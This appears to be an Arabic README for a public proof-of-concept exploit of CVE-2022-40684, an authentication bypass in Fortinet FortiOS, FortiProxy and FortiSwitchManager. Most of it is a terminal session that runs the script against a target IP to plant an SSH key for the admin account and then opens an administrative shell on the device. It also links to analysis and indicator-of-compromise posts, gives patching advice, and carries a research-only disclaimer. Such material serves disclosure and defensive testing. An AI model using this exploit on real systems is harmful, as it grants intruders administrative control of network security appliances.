
استغلال لإثبات المفهوم لثغرة CVE-2022-40684 التي تؤثر على Fortinet FortiOS وFortiProxy وFortiSwitchManager
إثبات المفهوم (POC) لثغرة CVE-2022-40684 التي تؤثر على أجهزة Fortinet FortiOS وFortiProxy وFortiSwitchManager.
يمكن العثور على تحليل فني للسبب الجذري للثغرة على مدونتنا: https://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684
لتحليل سجلات Fortinet بحثًا عن مؤشرات الاختراق ومعرفة كيفية تفعيل سجلات أعمق، راجع مدونة IOC الخاصة بنا: https://www.horizon3.ai/fortinet-iocs-cve-2022-40684/
يستغل إثبات المفهوم هذا ثغرة تجاوز المصادقة لتعيين مفتاح SSH للمستخدم المحدد.
root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
root@kali:~# ssh [email protected]
fortios_7_2_1 #
config Configure object.
get Get dynamic and system information.
show Show configuration.
diagnose Diagnose facility.
execute Execute static commands.
alias Execute alias commands.
exit Exit the CLI.
قم بالتحديث إلى أحدث إصدار أو خفّف من الثغرة باتباع التعليمات الواردة في Fortinet PSIRT
تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعالة فقط، وليس المقصود استخدامه لمهاجمة الأنظمة إلا عند التصريح بذلك صراحةً. القائمون على المشروع غير مسؤولين عن إساءة استخدام البرنامج. استخدمه بمسؤولية.